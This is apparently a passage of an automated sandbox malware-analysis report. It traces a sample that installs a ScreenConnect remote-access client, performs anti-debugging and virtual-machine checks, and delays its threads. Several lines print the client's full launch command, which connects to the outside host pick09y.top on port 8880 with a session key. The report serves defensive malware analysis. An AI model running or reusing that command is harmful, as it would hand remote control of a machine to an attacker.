                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F54A4B FindFirstFileExA,0_2_00F54A4B
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\Jump to behavior
                  Source: Amcache.hve.12.drBinary or memory string: VMware
                  Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: svchost.exe, 0000000D.00000003.2614693181.000001D225264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTcpV6VMWare
                  Source: dfsvc.exe, 00000001.00000002.3917547466.0000023571773000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3912001383.000002356F390000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3751190494.00000133B0C57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3748015420.00000133AB42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886697449.000001D22422B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D2242A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677267062.000001D2242A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 00000007.00000002.3886580352.00000000008B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.12.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.12.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.12.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F54573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F54573
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F51000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F51000
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F53677 mov eax, dword ptr fs:[00000030h]0_2_00F53677
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F56893 GetProcessHeap,0_2_00F56893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F51493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F51493
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F54573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F54573
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F5191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F5191F
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F51AAC SetUnhandledExceptionFilter,0_2_00F51AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: ScreenConnect.ClientService.dll.1.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5856 -ip 5856
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 316
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\c33t3yqg.mwr\be27gn6q.q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\screenconnect.clientservice.exe" "?e=support&y=guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=bgiaaackaabsu0exaagaaaeaaqddgakam2sc4a%2b0vjsnximnzoex5mkrna0gdqvtzfuyhui4mxfaier02wciarvbkqtcbocnzy6cohwlxqtjbxchk5v9nclpcj0vsmvq5ngzm5kwtjoirlp48nx7xw8h5tmli69zhw7bdotif1%2bzod8%2bp9ttrfgxjhbbseiblgi17jx%2ffgldqyfbxwovwjyusfapm2b6yerofjh%2b%2fcllgayedlbz3cjwk2rkmq6rxdojaigyxzfrbilrifetmhax7zlc%2fb3uiiepox2rwmozfqlj%2bubobd89ykn0ubh3alvd%2b8orlqspyebcok4rg%2fouoyveicokqxda0lwuzw70luvi&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\c33t3yqg.mwr\be27gn6q.q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\screenconnect.clientservice.exe" "?e=support&y=guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=bgiaaackaabsu0exaagaaaeaaqddgakam2sc4a%2b0vjsnximnzoex5mkrna0gdqvtzfuyhui4mxfaier02wciarvbkqtcbocnzy6cohwlxqtjbxchk5v9nclpcj0vsmvq5ngzm5kwtjoirlp48nx7xw8h5tmli69zhw7bdotif1%2bzod8%2bp9ttrfgxjhbbseiblgi17jx%2ffgldqyfbxwovwjyusfapm2b6yerofjh%2b%2fcllgayedlbz3cjwk2rkmq6rxdojaigyxzfrbilrifetmhax7zlc%2fb3uiiepox2rwmozfqlj%2bubobd89ykn0ubh3alvd%2b8orlqspyebcok4rg%2fouoyveicokqxda0lwuzw70luvi&r=&i=untitled%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\c33t3yqg.mwr\be27gn6q.q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\screenconnect.clientservice.exe" "?e=support&y=guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=bgiaaackaabsu0exaagaaaeaaqddgakam2sc4a%2b0vjsnximnzoex5mkrna0gdqvtzfuyhui4mxfaier02wciarvbkqtcbocnzy6cohwlxqtjbxchk5v9nclpcj0vsmvq5ngzm5kwtjoirlp48nx7xw8h5tmli69zhw7bdotif1%2bzod8%2bp9ttrfgxjhbbseiblgi17jx%2ffgldqyfbxwovwjyusfapm2b6yerofjh%2b%2fcllgayedlbz3cjwk2rkmq6rxdojaigyxzfrbilrifetmhax7zlc%2fb3uiiepox2rwmozfqlj%2bubobd89ykn0ubh3alvd%2b8orlqspyebcok4rg%2fouoyveicokqxda0lwuzw70luvi&r=&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F51BD4 cpuid 0_2_00F51BD4
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
